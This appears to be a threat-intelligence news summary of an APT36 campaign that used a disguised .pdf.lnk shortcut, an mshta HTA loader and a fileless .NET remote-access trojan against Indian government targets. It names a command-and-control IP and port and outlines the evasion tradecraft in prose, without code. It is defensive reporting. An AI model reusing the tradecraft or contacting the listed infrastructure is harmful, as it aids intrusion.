In a technical analysis by CYFIRMA researchers reported a targeted malware campaign attributed to APT36 that used an oversized .lnk shortcut embedding a full PDF to target Indian government entities, first observed on 2025-12-15 and communicating with C2 IP 2.56.10.86 on TCP port 8621.
KEY FACTS
- Incident Targeted spear-phishing delivering a ZIP with a double extension .pdf.lnk
- Threat actor APT36 attributed operation
- Technique mshta based HTA loader and fileless .NET DLL execution
- Observed first 2025-12-15
Initial access was via a ZIP archive named “Online JLPT Exam Dec 2025.zip” that contained a .pdf.lnk shortcut crafted to include a full PDF structure to appear legitimate. The shortcut launched mshta.exe to fetch a remote HTA and to open a decoy PDF while malicious code ran in the background.
The HTA loader used obfuscation, custom Base64 and XOR decoding and environment manipulation. Two staged payload containers called ReadOnly and WriteOnly were reconstructed in memory. ReadOnly carried serialized XAML configuration that disabled .NET deserialization safeguards. WriteOnly was a fileless DLL executed in memory that acted as the core RAT.
The in-memory malware implemented extensive espionage capabilities including system profiling, file enumeration and theft of Office and database files, screenshot capture and remote desktop, clipboard theft and manipulation, remote shell execution and encrypted C2 using AES. Persistence routines were adapted based on detected antivirus products with distinct paths for Kaspersky, Quick Heal and Avast family products.
Recommended mitigations include blocking shortcut files in email, enforcing display of full file extensions, restricting execution of living off the land binaries such as mshta.exe and PowerShell where not required, deploying EDR with behavior detection of in-memory deserialization and monitoring outbound encrypted connections to untrusted infrastructure. The scope of compromise across organizations was not quantified in the report.
WHY IT MATTERS
The operation demonstrates evolved tradecraft that blends file format deception with fileless, in-memory execution to reduce forensic traces and to maintain long term access. Organizations should prioritize behavior based detection and strict controls on scriptable system utilities to reduce exposure.